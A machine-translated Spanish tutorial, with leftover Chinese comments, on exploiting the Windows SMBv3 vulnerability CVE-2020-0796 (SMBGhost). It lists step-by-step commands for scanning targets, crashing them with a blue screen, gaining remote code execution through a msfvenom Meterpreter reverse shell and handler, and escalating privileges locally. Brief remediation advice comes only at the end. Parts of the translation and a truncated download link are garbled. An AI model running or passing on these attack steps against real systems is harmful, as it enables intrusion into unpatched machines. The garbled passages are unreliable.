Tabla de contenido
Descripción de la vulnerabilidad
Existe una vulnerabilidad de ejecución remota de código en la forma en que el protocolo Microsoft Server Message Block 3.1.1 (SMBv3) procesa ciertas solicitudes, también conocida como "vulnerabilidad de ejecución remota de código cliente / servidor Windows SMBv3".
Versión de impacto
- Windows 10 versión 1903 para sistemas de 32 bits
- Windows 10 versión 1903 (para sistemas basados en ARM64)
- Windows 10 versión 1903 (para sistemas basados en x64)
- Windows 10 versión 1909 para sistemas de 32 bits
- Windows 10 versión 1909 (para sistemas basados en ARM64)
- Windows 10 versión 1909 (para sistemas basados en x64)
- Windows Server versión 1903 (instalación Server Core)
- Windows Server versión 1909 (instalación Server Core)
Detección de vulnerabilidades
Utilice la herramienta:
https://github.com/GuoKerS/aioScan_CVE-2020-0796
Instrucciones:
#安装python模块
python3 -m pip install netaddr
#脚本利用 python3 aioscan_2020_0796.py <ip>
python3 aioscan_2020_0796.py 192.168.206.137
Indicar Vulnerable!!
que hay una vulnerabilidad
Explotar
Windows 10 versión de 1903 (para sistemas basados en x64) de Thunder descarga dirección:
trueno: // QUFodHRwOi8veHoxLmRhb2hhbmc0LmNvbS9jbl93aW5kb3dzXzEwX2NvbnN1bWVyX2VkaXRpb25zX3ZMTlfwOi8veHoxLmRhb2hhbmc0LmNvbS9jbl93aW5kb3dzXzEwX2NvbnN1bWVyX2VkaXRpb25zX3ZMTlfwOi8veHoxLmRhb2hhbmc0LmNvbS9jbl93aW5kb3dzXzEwX2NvbnN1bWVyX2VkaXRpb1
Ataque de pantalla azul
Utilice la herramienta:
https://github.com/eerykitty/CVE-2020-0796-PoC
Utilice el tutorial:
#进入下载好的脚本目录,安装python模块
python3 -m pip install -r requirements-test.txt
python3 -m pip install ntlm_auth pyasn1 cryptography
#脚本利用
#python3 CVE-2020-0796.py <ip>
python3 CVE-2020-0796.py 192.168.206.137
Ejecución remota de código
Versión de Python: 3.6.6
requiere la versión de python3.6. Después de que 3.7 ejecute el script, aparecerá una pantalla azul y no podrá ejecutar comandos remotos.
Enlace de descarga: https://www.python.org/downloads/release/python-366/
Utilice la herramienta:
https://github.com/chompie1337/SMBGhost_RCE_PoC
Después de descargar la herramienta, primero genere el código de shell del shell inverso:
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.206.128 lport=4444 -f py -o shellcode.txt
Copie shellcode.txt
el shell y reemplace buf con USER_PAYLOAD
小技巧,windows的文本工具可以替换字符
Copie el exploit.py
código de shell modificado en el archivo de script que descargamos , reemplace USER_PAYLOAD
kali y habilite la supervisión de msf:
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.206.128
set lport 4444
run
Ataque de explotación de script exp:
python36 exploit.py -ip 192.168.206.141
Cuando se muestre la ejecución [+] Press a key to execute shellcode!
,
presione Enter msf para obtener los permisos de shell:
shell
Escalada local
Descarga usando ataque:
https://github.com/danigargu/CVE-2020-0796
Necesita generar exe, generar exe necesita usar Visual Studio
Después de descargar, abra Visual Studio, cargue el proyecto y abra el archivo CVE-2020-0796.sln . Después de que
se
genere el exe , habrá una \x64\Debug\
carpeta en su directorio exp
Para copiar el archivo exe para Windows 10, es necesario desactivar el firewall y desactivar la protección en tiempo real.
Utilización de secuencias de comandos:
exe se puede ejecutar directamente
Sugerencias de reparación
- Actualice Windows o instale parches a tiempo: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796
- Correr
regedit.exe
, abra el editor del registro,HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\ Parameters
crear un archivo llamadoDisableCompression
enDWORD
, está1
prohibida característica de compresión SMB.